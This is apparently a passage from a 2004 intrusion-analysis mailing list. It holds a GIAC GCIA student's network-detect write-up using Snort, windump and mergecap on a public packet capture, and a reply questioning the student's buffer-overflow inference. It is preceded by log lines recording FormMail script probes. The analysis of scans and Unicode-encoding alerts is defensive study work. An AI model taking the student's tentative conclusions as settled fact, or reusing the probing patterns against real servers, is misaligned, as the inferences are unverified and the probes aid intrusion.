"POST /cgi-bin/formmail.cgi HTTP/1.0" 404 5540 213.149.103.76 - - [10/Jul/2004:20:07:18 -0400] "POST /cgi-bin/FormMail.pl HTTP/1.0" 404 5540 80.65.103.231 - - [10/Jul/2004:20:07:19 -0400] "POST /mail.cgi HTTP/1.0" 404 5540 207.248.159.253 - - [10/Jul/2004:20:07:23 -0400] "POST /cgi-bin/fmail.pl HTTP/1.0" 404 5540 66.68.229.28 - - [10/Jul/2004:20:07:32 -0400] "POST /cgi-bin/form.cgi HTTP/1.1" 404 5540 80.65.103.231 - - [10/Jul/2004:20:07:33 -0400] "POST /cgi-bin/contact.pl HTTP/1.0" 404 5540 207.156.61.10 - - [10/Jul/2004:20:07:34 -0400] "POST /cgi/formmail HTTP/1.0" 404 5540 From mohankc_2002 at yahoo.com Mon Jul 12 20:27:17 2004 From: mohankc_2002 at yahoo.com (Mohan Chirumamilla) Date: Mon, 12 Jul 2004 13:27:17 -0700 (PDT) Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong Message-ID: <20040712202717.68779.qmail@web20228.mail.yahoo.com> > It's obvious that host 192.168.17.68 is a web server > and it's IIS. The data field displayed in hex above is > '90' (NOP bytes usually used by shellcode) which seems > like someone is trying a buffer overflow on the web > server. What makes you think that the attacker did not craft his packets with these "characteristics"? ----- Original Message ----- From: "Vilaiporn Taweelappontong" To: Sent: Saturday, July 10, 2004 9:30 PM Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong > Dear all > > This is a second attempt to post the assignment. I > would really appreciate if someone could give me > comments on my analysis. > > Thank you very much in advance and regards, > Vilaiporn > > > 1. Source of trace > Source of trace was file 2003.12.15.6 downloaded from > www.incidents.org/log. > > -Statistics (from Ethereal) > File length: 3000044 > Format: libpcap > Start time: 2:07:16.936242 > End time: 2:08:17.518422 > Elapsed time between first and last packet: 60.582 > seconds > Packet count: 36672 > Snapshot length: 96 > > > I used the Statistics function of ethereal to > summarize a list of IP addresses and MAC addresses in > the file. And I looked up a vendor Ethernet MAC > address from the web site > http://www.coffer.com/mac_find/. Below is an > architecture base on my understanding: > > > 10.10.10.165 (00:03:47:8c:89:c2 Intel machine ) ---> > 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall > ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE) > > Observation: > File date and timestamp reported are different. The > file name indicate that the data should be 2003/12/15 > but the date specified in all packets actually > indicated packets generated on 2003/11/19. I > understand that some technique was used to obfuscate > the information, such as modify ip address, as > checksum of all packets are correct. Or no obfuscation > has been done. > > 2. Detect was generated by > The file is stored in tcpdump binary format. The > detect presented in this assignment was generated by > Snort version 2.1.1, which I ran the analysis with my > Windows 2000 Server machine. I ran snort in the NIDS > mode with standard snort ruleset downloaded on 2 May > 2004. All rules files were enabled. Command that was > used: > > C:\snort\bin\snort -r 2003.12.5.6 -c > c:\snort\etc\snort.conf -l ex1 -X -d -A full > > -r 2003.12.5.6 read source file 2003.12.5.6 > -c c:\snort\etc\snort.conf run against the > configuration file snort.conf > -l ex1 log the output file (alert file and log file) > in ex1 folder > -X dump the raw packet data starting at the link layer > (in this case, this is the Ethernet header) > -d dump the application layer (dump the packet > payloads with the packet headers) > -A full display text alert with full packet headers > > The selected alert result is as follow: > > [**] (http_inspect) BARE BYTE UNICODE ENCODING [**] > 11/19-02:08:04.823979 10.10.10.165:1085 -> > 192.168.17.68:80 > TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF > ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 > TcpLen: 20 > > The snort rule that trigger the 'Bare Byte Unicode > Encoding' was the http_inspect in the preprocessor > configure. [1] Preprocessors take the decoded packets > from the Snort packet decoder and can examine or > manipulate them before they are handed to the > detection engine. > > preprocessor stream4_reassemble > > preprocessor http_inspect: global \ > iis_unicode_map unicode.map 1252 > > preprocessor http_inspect_server: server default \ > profile all ports { 80 8080 8180 } \ > oversize_dir_length 500 > > Note that profile all includes the 'bare byte > decoding' enabled. The following configuration were > displayed when you run snort (without quiet option > enabled). You can see that the bare byte option was > set to YES. > > HttpInspect Config: > GLOBAL CONFIG > Max Pipeline Requests: 0 > Inspection Type: STATELESS > Detect Proxy Usage: NO > IIS Unicode Map Filename: > c:\snort\etc\unicode.map > IIS Unicode Map Codepage: 1252 > DEFAULT SERVER CONFIG: > Ports: 80 8080 8180 > Flow Depth: 300 > Max Chunk Length: 500000 > Inspect Pipeline Requests: YES > URI Discovery Strict Mode: NO > Allow Proxy Usage: NO > Disable Alerting: YES > Oversize Dir Length: 500 > Only inspect URI: NO > Ascii: YES alert: NO > Double Decoding: YES alert: YES > %U Encoding: YES alert: YES > Bare Byte: YES alert: YES > Base36: OFF > UTF 8: OFF > IIS Unicode: YES alert: YES > Multiple Slash: YES alert: NO > IIS Backslash: YES alert: NO > Directory: YES alert: NO > Apache WhiteSpace: YES alert: YES > IIS Delimiter: YES alert: YES > IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG > Non-RFC Compliant Characters: NONE > > > > To look into the packet in details, I used windump to > generate packet in hex format: > > C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host > 192.168.17.68 and port 80" > > 02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len > 41) 10.10.10.165.1085 > 192. > 168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) > ack 380024539 win 17520 (DF) > 4500 0029 a660 4000 8006 6dd3 > 0a0a 0aa5 > c0a8 1144 043d 0050 e4f1 8713 > 16a6 b6db > 5010 4470 b6b3 0000 9000 0000 > 0000 > > > It's obvious that host 192.168.17.68 is a web server > and it's IIS. The data field displayed in hex above is > '90' (NOP bytes usually used by shellcode) which seems > like someone is trying a buffer overflow on the web > server. > > Let's also look at other packets associated with host > 192.168.17.68 for a better analysis. > > C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host > 192.168.17.68" > 11/19-02:07:48.841453 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:51.828714 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:57.968183 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:59.094302 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:02.163499 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:04.823979 10.10.10.165:1085 -> > 192.168.17.68:80 > TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF > ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 > TcpLen: 20 > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:08.302980 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:09.095015 10.10.10.165:1711 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:12.089067 10.10.10.165:1711 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > Run time for packet processing was 0.750000 seconds > > The above information still not enough to analyse the > intruder's attempt so I have merged all log files into > one with the following command. > > C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 > 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 > 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 > 2003.12.15.11 2003.12.15.12 2003.12.15.13 > 2003.12.15.14 > > Then I ran snort again with the same set of rules. > Some of the results that I got were shown below: > > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.114599 10.10.10.165:2695 -> > 192.168.17.68:1 > TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.115021 10.10.10.165:2696 -> > 192.168.17.68:2 > TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.116627 10.10.10.165:2697 -> > 192.168.17.68:3 > TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.117195 10.10.10.165:2698 -> > 192.168.17.68:4 > TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.117646 10.10.10.165:2699 -> > 192.168.17.68:5 > TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > The above are just sample packets. We can tell from > the generated packets that the attacker did TCP port > scan and UDP port scan to identified the open ports of > host 192.168.17.68. Once port 80 is found running, the > attack knew that this is a web server. So the attacker > was trying to scan the server with, probably, web > server scanning tools. > > 3. Probability the source address was spoofed > HTTP session requires a complete 3-way handshake. > This packet, however, did not complete the handshake > so it is unlikely that the source ip would be spoofed. > > 4. Description of attack > [1] Bare byte encoding is an IIS trick that uses > non-ASCII chars as valid values in decoding UTF-8 > values. This is NOT in the HTTP standard, as all > non-ASCII values have to be encoded with a %. Bare > byte encoding allows the user to emulate an IIS server > and interpret non-standard encodings correctly. > There are no legitimate clients that encoded UTF-8 > this way, since it is non-standard. > > For more descriptions on the terms being used, > > Unicode is a single unified character set. Unicode > provides a unique number for every character, no > matter what the platform, no matter what the program, > no matter what the language. [5] > UTF-8 is a method to encode character to Unicode. (one > of the three common encoding method) UTF-8 encodes > each Unicode character as a variable number of 1 to 4 > octets. Using Unicode/UTF-8, you can write in emails > and source code things such as Mathematics and > Sciences or different languages. > ASCII - ASCII code is the numerical representation of > a character. Because computer can only understand > numbers. All non-ASCII characters usually screwed up > when output it to the browser, such as some special > character or language. UTF-8 supports ASCII characters > but not very good in non-ASCII character. > > A http connection to the web server will usually start > with a request method such as GET or POST. All packets > (except for the highlighted one) has started a 3 way > handshake by initiating SYN to the web server. Somehow > the highlighted packet sent the packet with ACK flag > set to the web server without the request method. This > does not follow the RFC2616 and trigger snort rule to > alert. The result from Ethereal actually display this > packet at 'Continuation' which means there is no > request in the packet. > > 5. Attack mechanism > As I analyzed the combined log, I found that host > 10.10.10.165 tried various attacks against host > 192.168.17.68 including TCP scan, UDP scan, socks scan > and probably Unicode attack. Usually I would try to > obtain the correlation evidence from the secondary > resource such as web server to confirm the attack. > However, the secondary resource is not available in > this case and we only have the snort log up to less > than 2 hours. With such limitation I would assume that > the attack using Unicode, somehow, was used as part of > the scanning process and one of the scanning policy > happen to use the non-ASCII character that trigger the > snort rule to alert. > > To confirm my understanding, I set up a web server at > home and wrote some e-commerce pages. Then I ran snort > with the same rule set and used N-Stealth, a HTTP > Security Scanner, to scan the e-commerce application > that I created. N-Stealth used various combinations of > possible web application attack and generated a lot of > alerts including bare byte Unicode encoding' alerts. > > 6. Correlations > Bare byte Unicode encoding is considered under the > Unicode attack category. The Unicode attack was > previously raised by Bruce Schneier at > http://www.schneier.com/crypto-gram-0007.html > > 7. Evidence of active targeting > The attacker was trying to scan for vulnerable host. > Host 192.168.17.68 is not the key target at first. > > 8. Severity > Severity = (criticality + lethality) (system > counte